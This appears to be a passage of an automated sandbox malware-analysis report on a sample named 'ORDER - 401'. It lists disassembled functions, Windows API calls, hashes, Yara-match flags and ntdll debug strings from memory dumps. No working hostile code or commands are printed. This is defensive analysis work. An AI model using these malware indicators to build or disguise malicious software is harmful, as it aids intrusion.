                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                  • Instruction ID: d46bfabfc098e6d5a2aad821b6b2a61ea91c21e50ceafb7c4f345b9124cf626d
                                                                                  • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                  • Instruction Fuzzy Hash: 98E026366006043BC210FA6ADC01FD7776CDFC5B10F000819FA0867242C7B4B90087F4
                                                                                  Function 01052B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2d98ecf426a0067fc6dd25b39c831091943ad133a95e6e4dcf2d6e2e60f356a6
                                                                                  • Instruction ID: d737fd3380421eb5d08c2c783d4e58ee5c78ff2e0529cdd53a1fd26495f7ff54
                                                                                  • Opcode Fuzzy Hash: 2d98ecf426a0067fc6dd25b39c831091943ad133a95e6e4dcf2d6e2e60f356a6
                                                                                  • Instruction Fuzzy Hash: 589002B12025000351057158841461A400E97E0201B55C022E5414590DC52589916225
                                                                                  Function 01052DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 61e17b97c6b63987dacd273c9a687ac791b5d70ab7b81e4da4eb5b1899462b18
                                                                                  • Instruction ID: eb249eeb24479089632b5d725758b86f09f2c9ccb826e5f24c676ce559a09c19
                                                                                  • Opcode Fuzzy Hash: 61e17b97c6b63987dacd273c9a687ac791b5d70ab7b81e4da4eb5b1899462b18
                                                                                  • Instruction Fuzzy Hash: 2790027120150413E1117158850470B000D97D0241F95C413A4824558DD6568A52A221
                                                                                  Function 01052C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 73d272d7335d1182a2cbd558f4144b8dc977f5c513dd8b0ee962390414dcd136
                                                                                  • Instruction ID: 92de694c9e9b6133db135cd61d34511add8113cb14b06e017181d568aa353d32
                                                                                  • Opcode Fuzzy Hash: 73d272d7335d1182a2cbd558f4144b8dc977f5c513dd8b0ee962390414dcd136
                                                                                  • Instruction Fuzzy Hash: 9990027120158802E1107158C40474E000997D0301F59C412A8824658DC69589917221
                                                                                  Function 010535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 78ad8e819bcde0e13102bb260a44b54de53752a7a7d689dfe0a25f81794d79a0
                                                                                  • Instruction ID: 1de1848c147d3820c1081a185db8e7bbd2e160c6197a4d5712a12667ff670a3f
                                                                                  • Opcode Fuzzy Hash: 78ad8e819bcde0e13102bb260a44b54de53752a7a7d689dfe0a25f81794d79a0
                                                                                  • Instruction Fuzzy Hash: D790027160560402E1007158851470A100997D0201F65C412A4824568DC7958A5166A2
                                                                                  Function 004145A8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 4145a8-4145ae 1 4145b0-4145c4 0->1 2 414628-414641 0->2 3 414663-414668 2->3 4 414643-414654 PostThreadMessageW 2->4 4->3 5 414656-414660 4->5 5->3
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 04I_$086604I_P$086604I_P
                                                                                  • API String ID: 1836367815-762223272
                                                                                  • Opcode ID: 3cfd6ed29607252215f596f045744a4ea9eb262d71c1a3a603205bf06dbbed58
                                                                                  • Instruction ID: 7364b2b1fcad01788479a4f9307d5c54d4abcef8cf499afca70ead5bc7e82b5e
                                                                                  • Opcode Fuzzy Hash: 3cfd6ed29607252215f596f045744a4ea9eb262d71c1a3a603205bf06dbbed58
                                                                                  • Instruction Fuzzy Hash: 59F02B32B0534C75D71186549C41FFEBB68DF82B18F0402DAE904AA140D679190687D5
                                                                                  Function 004145C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 086604I_P$086604I_P
                                                                                  • API String ID: 1836367815-368392577
                                                                                  • Opcode ID: 9faca414eb337fa319e387a092d35be794f1d16e79f047f58bbeb488bc85edba
                                                                                  • Instruction ID: 3b1c6bc8a4282993d6e4a2e48ae66367294b2a1ba01f1a571c31a1870c0ceae8
                                                                                  • Opcode Fuzzy Hash: 9faca414eb337fa319e387a092d35be794f1d16e79f047f58bbeb488bc85edba
                                                                                  • Instruction Fuzzy Hash: 25112972D8021C76E711A6919C42FDF7B7C8F81B58F404169FA047B2C0D6B85A0687E9
                                                                                  Function 004145D3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 086604I_P$086604I_P
                                                                                  • API String ID: 1836367815-368392577
                                                                                  • Opcode ID: 2eede3f84bbbc3eef2b243bf2801b5c3105a0f127df9a857c8291aedbf75753a
                                                                                  • Instruction ID: 0fb9ab954ef8db3f32d4c25afcf056a5d19c50fc272c64c350af8f6a8d246f1f
                                                                                  • Opcode Fuzzy Hash: 2eede3f84bbbc3eef2b243bf2801b5c3105a0f127df9a857c8291aedbf75753a
                                                                                  • Instruction Fuzzy Hash: CA01D671E4025876EB21A6919C42FDF7B7C9F81B58F014169FA047B2C0D6BC5A0687E9
                                                                                  Function 00417E46 Relevance: 1.6, APIs: 1, Instructions: 90libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 231 417e46-417e49 232 417dd8-417de1 231->232 233 417e4b-417e52 231->233 234 417de3-417df7 LdrLoadDll 232->234 235 417dfa-417dfd 232->235 236 417e54-417e68 233->236 237 417e3a-417e3c 233->237 234->235 240 417e69-417e7a 236->240 238 417e3f-417e41 237->238 239 417e3e 237->239 241 417e01-417e02 238->241 242 417e43-417e44 238->242 239->238 244 417e7b-417e9b 240->244 244->244 245 417e9d-417e9f 244->245 246 417ea1 245->246 247 417eff-417f3e call 42f933 call 42bcb3 245->247 246->240 248 417ea3-417ea5 246->248 248->247
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                                  • Instruction ID: 6fda3640aeabacdf2414ac2a0c0e5c28ef028ee1734c6d5c1d6e7c4e4c655ad8
                                                                                  • Opcode Fuzzy Hash: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                                  • Instruction Fuzzy Hash: 0021BE7554D3895ACB11DBA4CC80BDEBB74DF46328F0443DEE444CF282D664D94583D5
                                                                                  Function 0042D003 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 273 42d003-42d044 call 404623 call 42dea3 RtlFreeHeap
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D08CFFD5,00000007,00000000,00000004,00000000,004175E7,000000F4), ref: 0042D03F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                                  • Instruction ID: 480c2476483c24a98dc1ccd4d3f8387b92b9bc50a10ea559d801330f157754dd
                                                                                  • Opcode Fuzzy Hash: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                                  • Instruction Fuzzy Hash: CCE065B66046147FE710EFA9EC41E9B33ACEFC9710F00041AFA08A7241D778B9108AB9
                                                                                  Function 0042CFB3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 268 42cfb3-42cff4 call 404623 call 42dea3 RtlAllocateHeap
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,0041EB4E,?,?,00000000,?,0041EB4E,?,?,?), ref: 0042CFEF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                  • Instruction ID: dc73a00d5b2d417b2c46dafea40d9adc71060332ee157e8bfc2b2fc429177c5c
                                                                                  • Opcode Fuzzy Hash: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                  • Instruction Fuzzy Hash: 2DE06DB66042047BD610EE59EC41E9B33ACDFC9710F000819F908A7241D675BA118BB9
                                                                                  Function 0042D053 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 283 42d053-42d08c call 404623 call 42dea3 ExitProcess
                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,B9F6A3FE,?,?,B9F6A3FE), ref: 0042D087
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  • Opcode ID: 15264c56b12c26b86eb90c2dabc34e6d55a96133bf5bcb6f2ee9bafa70ba7c0d
                                                                                  • Instruction ID: 7a9833e9e4d947a3999cb396ff3879e5195884ea37e196f788b44d0b0899353c
                                                                                  • Opcode Fuzzy Hash: 15264c56b12c26b86eb90c2dabc34e6d55a96133bf5bcb6f2ee9bafa70ba7c0d
                                                                                  • Instruction Fuzzy Hash: D2E04F722406147BC210FA5ADC02F9B775CDBC5715F10845AFA086B241D7B9791587A8
                                                                                  Function 01052C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 288 1052c0a-1052c0f 289 1052c11-1052c18 288->289 290 1052c1f-1052c26 LdrInitializeThunk 288->290
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 6944b43121295d54f8731a656cd16e7cc55da7c185ad1c9c9c74deab6fd0f56c
                                                                                  • Instruction ID: 9cd64cdc25ced82c0dcf1a48b3e5546e7cde67a075881a1cb05936c76589ce8c
                                                                                  • Opcode Fuzzy Hash: 6944b43121295d54f8731a656cd16e7cc55da7c185ad1c9c9c74deab6fd0f56c
                                                                                  • Instruction Fuzzy Hash: 06B09B719015C5C5EB51E764460871B7D447BD0701F15C062D6430641F4738C1D1E275

                                                                                  Non-executed Functions

                                                                                  Function 010C8D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 010C8F26
                                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 010C8DA3
                                                                                  • *** enter .cxr %p for the context, xrefs: 010C8FBD
                                                                                  • The resource is owned shared by %d threads, xrefs: 010C8E2E
                                                                                  • The instruction at %p tried to %s , xrefs: 010C8F66
                                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 010C8F3F
                                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 010C8FEF
                                                                                  • The instruction at %p referenced memory at %p., xrefs: 010C8EE2
                                                                                  • *** then kb to get the faulting stack, xrefs: 010C8FCC
                                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 010C8E02
                                                                                  • Go determine why that thread has not released the critical section., xrefs: 010C8E75
                                                                                  • The resource is owned exclusively by thread %p, xrefs: 010C8E24
                                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010C8E86
                                                                                  • This failed because of error %Ix., xrefs: 010C8EF6
                                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 010C8F2D
                                                                                  • <unknown>, xrefs: 010C8D2E, 010C8D81, 010C8E00, 010C8E49, 010C8EC7, 010C8F3E
                                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 010C8F34
                                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 010C8DC4
                                                                                  • *** Inpage error in %ws:%s, xrefs: 010C8EC8
                                                                                  • The critical section is owned by thread %p., xrefs: 010C8E69
                                                                                  • read from, xrefs: 010C8F5D, 010C8F62
                                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 010C8D8C
                                                                                  • a NULL pointer, xrefs: 010C8F90
                                                                                  • an invalid address, %p, xrefs: 010C8F7F
                                                                                  • write to, xrefs: 010C8F56
                                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 010C8DB5
                                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 010C8DD3
                                                                                  • *** enter .exr %p for the exception record, xrefs: 010C8FA1
                                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 010C8E4B
                                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010C8E3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                  • API String ID: 0-108210295
                                                                                  • Opcode ID: c676f0a97e0958132c43945f6947e46c37b377be9b2711b0b98abf782bfb4637
                                                                                  • Instruction ID: 6160949142ef42793e9f1665cdfd614ac5de0723571b9f238261840277937d9c
                                                                                  • Opcode Fuzzy Hash: c676f0a97e0958132c43945f6947e46c37b377be9b2711b0b98abf782bfb4637
                                                                                  • Instruction Fuzzy Hash: EB81D575A40202BFEB17AB198C45EAF3F75EB56F14F01408EF284AF192E3B18452DE65
                                                                                  Function 01092349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  • Opcode ID: 9cf62d752fe8bc31fbd13e36b849e5037825aeffbb886f6e38886ff5f6aecbad
                                                                                  • Instruction ID: 23b23b9de623d20c386e6890c4f39f98deda043d8bd214e75d51ee16ad405cb6
                                                                                  • Opcode Fuzzy Hash: 9cf62d752fe8bc31fbd13e36b849e5037825aeffbb886f6e38886ff5f6aecbad
                                                                                  • Instruction Fuzzy Hash: 03929F71604346AFEB25DE28C890BABB7E8BF84754F04492DFAD4D7290D770E844DB92
                                                                                  Function 01048620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010854E2
                                                                                  • double initialized or corrupted critical section, xrefs: 01085508
                                                                                  • Thread identifier, xrefs: 0108553A
                                                                                  • Critical section debug info address, xrefs: 0108541F, 0108552E
                                                                                  • undeleted critical section in freed memory, xrefs: 0108542B
                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0108540A, 01085496, 01085519
                                                                                  • Critical section address, xrefs: 01085425, 010854BC, 01085534
                                                                                  • 8, xrefs: 010852E3
                                                                                  • Address of the debug info found in the active list., xrefs: 010854AE, 010854FA
                                                                                  • Critical section address., xrefs: 01085502
                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010854CE
                                                                                  • corrupted critical section, xrefs: 010854C2
                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01085543
                                                                                  • Invalid debug info address of this critical section, xrefs: 010854B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                  • API String ID: 0-2368682639
                                                                                  • Opcode ID: 44fdcd36553f298d823573d6a30007fb1f5489c46fd7746497f83b6efd52fb8c
                                                                                  • Instruction ID: 5fb72dc33cf5564258d64d438d95af4cd63355e6d8a01fc63facbb3b368e7451
                                                                                  • Opcode Fuzzy Hash: 44fdcd36553f298d823573d6a30007fb1f5489c46fd7746497f83b6efd52fb8c
                                                                                  • Instruction Fuzzy Hash: F581AEB1A04349AFDB61DF99CC40BAEBBF5BF08B14F108159F684B7290D7B1A941DB60
                                                                                  Function 010429F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010825EB
                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010822E4
                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01082624
                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01082506
                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0108261F
                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01082409
                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010824C0
                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01082498
                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01082412
                                                                                  • @, xrefs: 0108259B
                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01082602
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                  • API String ID: 0-4009184096
                                                                                  • Opcode ID: b6cb45fcc087b59f753e08c401ad3b789d45d957eec520545351fbfe32d38b12
                                                                                  • Instruction ID: e47ff706b8a75c50d3f38e7557fc8c02843b22455a18a3b96fa30ce760a0aa08
                                                                                  • Opcode Fuzzy Hash: b6cb45fcc087b59f753e08c401ad3b789d45d957eec520545351fbfe32d38b12
                                                                                  • Instruction Fuzzy Hash: 7A0240F1D0422D9BDB61DB54CD80BEEB7B8AF54304F4041EAA689A7241DB709E84CF69
                                                                                  Function 010B8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                  • API String ID: 0-2515994595
                                                                                  • Opcode ID: 79694b89eb72eff230e6f6e82c56132cbe0082a91ced76b9a60724137c9b119e
                                                                                  • Instruction ID: c4ff00c2bf77adb9137d6e194a66e92faadfd885de5dd8e3da4816ba9e81b2df
                                                                                  • Opcode Fuzzy Hash: 79694b89eb72eff230e6f6e82c56132cbe0082a91ced76b9a60724137c9b119e
                                                                                  • Instruction Fuzzy Hash: E951B1B15083469BD325EF198888BEBBBECEF94740F14891FA9D8C3251E770D604CB92
                                                                                  Function 0102AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                  • API String ID: 0-3197712848
                                                                                  • Opcode ID: 627618d6b9e441e5b23645cdf7cbb4ecf68e418de8a901f0fd4b97882a23612d
